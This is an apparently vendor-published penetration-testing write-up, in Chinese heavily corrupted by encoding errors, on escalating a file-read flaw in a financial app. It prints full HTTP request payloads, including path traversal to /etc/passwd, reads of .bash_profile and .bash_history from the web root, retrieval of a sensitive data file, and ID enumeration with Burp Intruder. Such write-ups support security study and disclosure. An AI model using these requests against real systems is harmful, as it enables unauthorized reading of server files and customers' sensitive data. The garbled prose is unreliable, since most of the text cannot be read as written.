ׯÏÐÓÎÏ·

֤ȯ¼ò³Æ£º×¯ÏÐÓÎÏ· ֤ȯ´úÂ룺002212
È«Ììºò7x24СʱЧÀÍ£º 400-777-0777
Çå¾²ÔÆÐ§ÀÍ

°¸Àý·ÖÏíØ­Ò»´ÎÎļþ¶ÁÈ¡Îó²îµÄ¡°Î£º¦Éý¼¶¡±Àú³Ì

ÔÚÊÚȨ²âÊÔij½ðÈÚÀàAPPʱ£¬£¬£¬£¬£¬·¢Ã÷Ò»¸ö¼¦ÀßµÍΣÎļþ¶ÁÈ¡Îó²î£¬£¬£¬£¬£¬ÊµÑ齫ÆäÉý¼¶Îª¸ßΣ¡£¡£¡£¡£ ¡£·¢Ã÷Ê״η­¿ªAPPʱ£¬£¬£¬£¬£¬»áÏòЧÀÍÆ÷¶ÁÈ¡Îļþ¼ÓÔØ²¢Õ¹Ê¾Í¼Æ¬¡£¡£¡£¡£ ¡£²âÊÔʱһ¶¨Òª×Ðϸ£¬£¬£¬£¬£¬±ÊÕß·¢Ã÷Ö»ÓÐÊ״η­¿ªAPPʱ£¬£¬£¬£¬£¬²Å»á¼ÓÔØÍ¼Æ¬£¬£¬£¬£¬£¬ºóÃæÔÙ·­¿ªÓ¦¸ÃÊÇ×ÊÔ´Òѱ»¼Í¼£¬£¬£¬£¬£¬¾Í²»»áÏòЧÀÍÆ÷ÔٴξÙÐÐÇëÇóÁË¡£¡£¡£¡£ ¡£

°¸Àý·ÖÏíØ­Ò»´ÎÎļþ¶ÁÈ¡Îó²îµÄ¡°Î£º¦Éý¼¶¡±Àú³Ì

Ðû²¼Ê±¼ä£º2022-11-04
ä¯ÀÀ´ÎÊý£º3247
·ÖÏí£º

ÔÚÊÚȨ²âÊÔij½ðÈÚÀàAPPʱ£¬£¬£¬£¬£¬·¢Ã÷Ò»¸ö¼¦ÀßµÍΣÎļþ¶ÁÈ¡Îó²î£¬£¬£¬£¬£¬ÊµÑ齫ÆäÉý¼¶Îª¸ßΣ¡£¡£¡£¡£ ¡£

PS£º±¾ÎĽöÓÃÓÚÊÖÒÕÌÖÂÛÓëÆÊÎö£¬£¬£¬£¬£¬ÑϽûÓÃÓÚÈκβ»·¨ÓÃ;£¬£¬£¬£¬£¬Î¥ÕßЧ¹û×Ô×𡣡£¡£¡£ ¡£

0x00 ÆðԴ̽²â

·¢Ã÷Ê״η­¿ªAPPʱ£¬£¬£¬£¬£¬»áÏòЧÀÍÆ÷¶ÁÈ¡Îļþ¼ÓÔØ²¢Õ¹Ê¾Í¼Æ¬¡£¡£¡£¡£ ¡£

²âÊÔʱһ¶¨Òª×Ðϸ£¬£¬£¬£¬£¬±ÊÕß·¢Ã÷Ö»ÓÐÊ״η­¿ªAPPʱ£¬£¬£¬£¬£¬²Å»á¼ÓÔØÍ¼Æ¬£¬£¬£¬£¬£¬ºóÃæÔÙ·­¿ªÓ¦¸ÃÊÇ×ÊÔ´Òѱ»¼Í¼£¬£¬£¬£¬£¬¾Í²»»áÏòЧÀÍÆ÷ÔٴξÙÐÐÇëÇóÁË¡£¡£¡£¡£ ¡£

´Ë¼ÓÔØÕ¹Ê¾Í¼Æ¬µÄGETÇëÇóÊý¾Ý°üÈçÏ£º

GET /ixxx/LgonImage.do?XxxxxImageDir=/XXXXX/Pictures&SaveXxxxxImageName=this_is_image.jpg HTTP/1.1

Host: xxxxx.com

Connection: close

User-Agent: Mozilla/5.0

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,en-US;q=0.8

Äõ½Õâ¸öÊý¾Ý°üµÄµÚÒ»·´Ó¦£¬£¬£¬£¬£¬ÒÔÍùµÄÉøÍ¸²âÊÔÂÄÀú¸æËßÎÒ£¬£¬£¬£¬£¬´ÓÕâ¸öµØ·½»òÐí·»á±£´æÎļþ¶ÁÈ¡Îó²î¡£¡£¡£¡£ ¡£

ÆÊÎö²¢ÍƲ⹦ЧµãURIµÄÿ¸ö²ÎÊýµÄ¹¦Ð§¡£¡£¡£¡£ ¡£

LogonImageDir=/XXXXX/Pictures - ͼƬËùÔÚµÄĿ¼

SaveXxxxxImageName=this_is_image.jpg - Ŀ¼ÏµÄͼƬÃû

0x01 Îó²î²âÊÔ

¼ÈÈ»ÒѾ­ÆðԴ̽²âµ½ÁË¿ÉÄܱ£´æÎó²îµÄΣº¦µã£¬£¬£¬£¬£¬²¢ÇÒÎļþ¶ÁÈ¡¹¦Ð§µÄ²ÎÊýÒѾ­¸ãÇåÎú£¬£¬£¬£¬£¬ÏÂÒ»²½¾ÍÕö¿ª¶ÁÈ¡²âÊÔ¡£¡£¡£¡£ ¡£

Ê×ÏȲâÊÔ£¬£¬£¬£¬£¬ÊÇ·ñ¿ÉÒÔ¾ÙÐÐĿ¼Áгö£¬£¬£¬£¬£¬Ö±½Ó½«SaveXxxxxImageName²ÎÊýÖÿÕ£¬£¬£¬£¬£¬¿´¿´ÊÇ·ñ¿ÉÒÔ¶ÁÈ¡/XXXXX/PicturesĿ¼ÏµÄÄÚÈÝ£º

GET /ixxx/LogonImage.do?XxxxxImageDir=/XXXXX/Pictures&SaveXxxxxImageName= HTTP/1.1

Host: xxxxx.com

Connection: close

User-Agent: Mozilla/5.0

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,en-US;q=0.8

·µ»ØÎª¡°¿Õ¡±£¬£¬£¬£¬£¬Ê§°Ü£¬£¬£¬£¬£¬ËµÃ÷³ÌÐò¹¦Ð§µã²»±£´æÁгöĿ¼Îó²î£º

²âÊÔÊÇ·ñ¿ÉÒÔÌø³öĿ¼£¬£¬£¬£¬£¬Ñ¡ÓÃPayloadÈçÏ£º

GET /ixxx/LogonImage.do?XxxxxImageDir=/XXXXX/Pictures/../../../../../../etc/&SaveXxxxxImageName=passwd HTTP/1.1

Host: xxxxx.com

Connection: close

User-Agent: Mozilla/5.0

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,en-US;q=0.8

·µ»ØÄ³ºã·À»ðǽ×èµ²½çÃæ£¬£¬£¬£¬£¬Ê§°Ü£º

½ÓÏÂÀ´½øÒ»²½²âÊÔ£¬£¬£¬£¬£¬ÊÇ/etc/passwd´¥·¢µÄWAF£¬£¬£¬£¬£¬ÕÕ¾É/../´¥·¢µÄWAF¡£¡£¡£¡£ ¡£

²âÊÔÖ»¾ÙÐÐÒ»²ãÄ¿Â¼Ìø³ö£¬£¬£¬£¬£¬²¢ÇÒɾ³ý/etc/passwdÒªº¦×Ö£º

GET /ixxx/LogonImage.do?XxxxxImageDir=/XXXXX/Pictures/../&SaveXxxxxImageName= HTTP/1.1

Host: xxxxx.com

Connection: close

User-Agent: Mozilla/5.0

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,en-US;q=0.8

ßí...¿´À´/../µÄÌØÊâ×Ö·û¾ÍÒѾ­´¥·¢ÁËWAF£º

Ö®ºóÏ뵽ʵÑé¶ÔÊý¾Ý°ü¾ÙÐÐPOSTÀàÐÍת»»£¬£¬£¬£¬£¬Ê¹ÓÃPOST´«²ÎµÄһЩ·½·¨¾ÙÐÐWAFµÄ²âÊÔ£¬£¬£¬£¬£¬È磺

URL±àÂë

·Ö¿é´«Êä

ÔàÊý¾ÝÌî³ä

°üÌåת»»

»ûÐÎÊý¾Ý°ü

......

¿ÉÊÇÎÞÄΣ¬£¬£¬£¬£¬POSTÇëÇóÖ±½ÓÎÞ·¨´«²Î£¬£¬£¬£¬£¬³ÌÐòÏÞÖÆÁËGETÇëÇóÎüÊÕ²ÎÊý¡£¡£¡£¡£ ¡£

£¨²»¹ý£¬£¬£¬£¬£¬ØÊºó²âÊÔÆäËûPOST´«²ÎµÄ¹¦Ð§Ê±£¬£¬£¬£¬£¬·¢Ã÷ÒÔ±ÊÕßÏÖÓеÄWAFÈÆ¹ýÂÄÀú˼Ð÷£¬£¬£¬£¬£¬»ù´¡ÎÞ·¨¶ÔijºãµÄWAF¾ÙÐÐÈÆ¹ý.....£©

0x02 Îó²îÈ·ÈÏ

×ܽáÒÔÉ϶ԴËÎļþ¶ÁÈ¡Îó²îÍøÂçµ½µÄÐÅÏ¢£º

Ŀ¼ÎÞ·¨¿çÔ½£¬£¬£¬£¬£¬²¢ÇÒÎļþ¶ÁÈ¡µÄ·¾¶ÔÚÄ¿½ñ¸ùĿ¼£»£»£»£»£»

ÌØÊâ×Ö·û´®£¬£¬£¬£¬£¬Òѱ»WAFÍêÉÆ·À»¤×¡£¡£¡£¡£ ¡£»£»£»£»£»

ÎÞ·¨»ñȡĿ¼ÏµÄÎļþÃû¡¢ÎÞ·¨Ô¤ÖªÊÇ·ñ¿ÉÒÔ¶ÁÈ¡ÆäËûºó׺Îļþ¡£¡£¡£¡£ ¡£

²âÊÔµ½ÕâÀïͻȻÁé¹âÒ»ÉÁ£¬£¬£¬£¬£¬Ïëµ½ÁË¡°.bash_history¡±£¬£¬£¬£¬£¬ÈôÊÇÍøÕ¾¸ùĿ¼±£´æ´ËÎļþ£¬£¬£¬£¬£¬²¢ÇÒ¿ÉÒÔ¶ÁÈ¡£¬£¬£¬£¬£¬ÉÏÃæµÄÒÉÎʾͿÉÒÔÖ±½Ó½â¾öÌ©°ëÁË£¬£¬£¬£¬£¬ÏÈÀ´ÏàʶһÏÂÕâЩÎļþ×÷Óãº

.bash_profile£º´ËÎļþΪϵͳµÄÿ¸öÓû§ÉèÖÃÇéÐÎÐÅÏ¢£¬£¬£¬£¬£¬µ±Óû§µÚÒ»´ÎµÇ¼ʱ£¬£¬£¬£¬£¬¸ÃÎļþ±»Ö´ÐС£¡£¡£¡£ ¡£

.bash_history£º¸ÃÎļþÉúÑÄÁËÄ¿½ñÓû§ÊäÈë¹ýµÄÀúÊ·ÏÂÁ£»£»£»£»

.bash_logout£º¸ÃÎļþµÄÓÃ;ÊÇÓû§×¢ÏúʱִÐеÄÏÂÁ£¬£¬£¬£¬Ä¬ÒÔΪ¿Õ£»£»£»£»£»

.bashrc£º´ËÎļþΪÿһ¸öÔËÐÐbash shellµÄÓû§Ö´ÐдËÎļþ¡£¡£¡£¡£ ¡£µ±bash shell±»·­¿ªÊ±£¬£¬£¬£¬£¬¸ÃÎļþ±»¶ÁÈ¡¡£¡£¡£¡£ ¡£

ÓÚÊÇÖ±½Ó¶ÔÍøÕ¾¸ùĿ¼¾ÙÐÐ.bash_profileµÄä²â£º

GET /ixxx/LogonImage.do?XxxxxImageDir=/&SaveXxxxxImageName=.bash_profile HTTP/1.1

Host: xxxxx.com

Connection: close

User-Agent: Mozilla/5.0

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,en-US;q=0.8

´Ëpayload¼È×èÖ¹ÁËÌø³öĿ¼£¬£¬£¬£¬£¬ÓֱܿªÁËWAFÑÏ´òµÄÌØÊâ×Ö·û£¬£¬£¬£¬£¬¿ÉÊÇΨһÒÅ©µÄ.bashÎļþ±»ÎÒÃÇʹÓõ½ÁË¡£¡£¡£¡£ ¡£

¼¤¶¯µÄÐIJü¶¶µÄÊÖ£¬£¬£¬£¬£¬¿´À´Ä¿½ñÍøÕ¾¸ùĿ¼ȷʵÊÇ´ËÓû§µÄĿ¼£¬£¬£¬£¬£¬²¢ÇÒÓû§Ôڴ˸ùĿ¼ÏÂÖ´ÐйýÏÂÁ

½ÓÏÂÀ´ÊµÑé½øÒ»²½À©´óΣº¦¡£¡£¡£¡£ ¡£

0x03 Σº¦Éý¼¶

²»ÇåÎúÄ¿½ñĿ¼½á¹¹£¬£¬£¬£¬£¬¾Í´ú±í×ÅÎÞ·¨¶¨Ïò¶ÁÈ¡Îļþ£¬£¬£¬£¬£¬¿ÉÊÇÉÐÓÐÒ»¸ö.bash_historyÎÒÃÇûÓÐʹÓõ½£¬£¬£¬£¬£¬¿´¿´ÊÇ·ñ¿ÉÒÔÔÚÆäÖлñÈ¡µ½¸üÖ÷ÒªµÄÐÅÏ¢¡£¡£¡£¡£ ¡£

¶ÁÈ¡¸ùĿ¼ÏµÄ.bash_history£º

GET /ixxx/LogonImage.do?XxxxxImageDir=/&SaveXxxxxImageName=.bash_history HTTP/1.1

Host: xxxxx.com

Connection: close

User-Agent: Mozilla/5.0

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,en-US;q=0.8

ÐÅÏ¢Á¿ËäÈ»ÉÙ£¬£¬£¬£¬£¬¿ÉÊÇÒѾ­ÓÐÁËеÄÏ£Íû£º

ÓÉÀúÊ·ÏÂÁîµÃÖª£¬£¬£¬£¬£¬ÖÎÀíÔ±cd½øÈëÁËÁ½²ãĿ¼£º/Nxxxx/xxFile/

²¢ÇÒÉó²éÁËxx_20201022_51xxx.txtÎļþ¡£¡£¡£¡£ ¡£

Ö±½Ó½á¹¹¶ÁÈ¡´ËÎļþ£¡

GET /ixxx/LogonImage.do?XxxxxImageDir=/Nxxxx/xxFile&SaveXxxxxImageName=xx_20201022_51xxx.txt HTTP/1.1

Host: xxxxx.com

Connection: close

User-Agent: Mozilla/5.0

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,en-US;q=0.8

ÀֳɶÁÈ¡µ½ÁËÃô¸ÐµÄÊý¾ÝÐÅÏ¢£º

²¢ÇÒÎļþµÄIDֵΪʱ¼ä´Á+ID˳Ðò±àºÅ×é³É£¬£¬£¬£¬£¬¿ÉÇáËɱéÀú³öËùÓеÄÐÅÏ¢¡£¡£¡£¡£ ¡£

Burpsuite IntruderÄ£¿£¿£¿é²âÊÔ£º

ʵÑé±éÀú10¸öIDÖµÀֳɡ£¡£¡£¡£ ¡£

0x04 »ØÊ××ܽá

±£´æµÄÄÑÌ⣺Ŀ¼ÎÞ·¨¿çÔ½¡¢WAF¶¢·À¡¢ÎÞ·¨Ô¤ÖªÄ¿Â¼Îļþ½á¹¹¡£¡£¡£¡£ ¡£

ÔÚ´ËÇéÐÎÏ£¬£¬£¬£¬£¬Ê¹ÓÃLinuxÎļþÏµÍ³ÌØÕ÷£¬£¬£¬£¬£¬ÈÔÈ»¿ÉÒÔ½«µÍΣÎó²îÌáÉýÖÁ¸ßΣ¡£¡£¡£¡£ ¡£

²¢ÇÒΣº¦µÄÆ·¼¶Æéá«ÊÇÎÞ·¨Ô¤¹ÀµÄ£¬£¬£¬£¬£¬ÕâÈ¡¾öÓÚ.bash_history»á¸øÎÒÃÇй¶¼¸¶àÐÅÏ¢£¬£¬£¬£¬£¬ÒÔÊÇÎļþ¶ÁÈ¡Îó²î±£´æÊ±¼äÔ½¾Ã£¬£¬£¬£¬£¬¼Í¼µÄ¹¤¾ßÔ½¶à£¬£¬£¬£¬£¬Î£º¦Ô½´ó£¡

Òªº¦´Ê±êÇ©£º
ÍøÂçÇå¾² Îļþ¶ÁÈ¡Îó²î,
¿Í»§Ð§ÀÍÈÈÏß

400-777-0777
7*24СʱЧÀÍ

ÁªÏµÓÊÏä

servicing@topsec.com.cn

ɨÂë¹Ø×¢
¡¾ÍøÕ¾µØÍ¼¡¿¡¾sitemap¡¿